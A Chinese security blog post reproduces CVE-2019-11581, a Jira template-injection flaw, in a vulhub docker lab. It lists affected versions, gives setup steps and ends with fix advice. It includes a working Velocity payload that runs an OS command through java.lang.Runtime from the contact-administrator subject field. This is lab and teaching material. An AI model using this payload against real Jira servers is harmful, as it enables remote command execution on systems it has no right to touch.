Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

admin 2021年4月23日04:05:18评论368 views字数 1038阅读3分27秒阅读模式

漏洞描述


Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。多个版本前存在利用模板注入执行任意命令:


影响范围


4.4.x5.x.x6.x.x7.0.x7.1.x7.2.x7.3.x7.4.x7.5.x7.6.x before 7.6.14 (the fixed version for 7.6.x)7.7.x7.8.x7.9.x7.10.x7.11.x7.12.x7.13.x before 7.13.5 (the fixed version for 7.13.x)8.0.x before 8.0.3 (the fixed version for 8.0.x)8.1.x before 8.1.2 (the fixed version for 8.1.x)8.2.x before 8.2.3 (the fixed version for 8.2.x)

 

 

环境搭建

 

这里使用docker进行安装

 

进入目录

cd vulhub/jira/CVE-2019-11581/

启动环境

docker-compose up -d


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

访问

http://your-ip:8080


选择将其设置为我

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

Atlassian官方申请一个Jira Server的测试证书

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

 

漏洞复现

 

登录成功后访问,添加

http://192.168.204.131:8080/secure/admin/AddSmtpMailServer!default.jspa



Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

访问,进行系统设置

http://192.168.204.131:8080/secure/admin/EditApplicationProperties!default.jspa


开启联系管理员表单


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

然后随便创建一个项目

创建成功后,访问

http://192.168.204.131:8080/secure/ContactAdministrators!default.jspa


 

漏洞爆发点在主题字段,把主题换上我们的payload,点击发送

Poc

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('touch /tmp/cve-2020-11581').toString()


Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月23日04:05:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现https://cn-sec.com/archives/202438.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息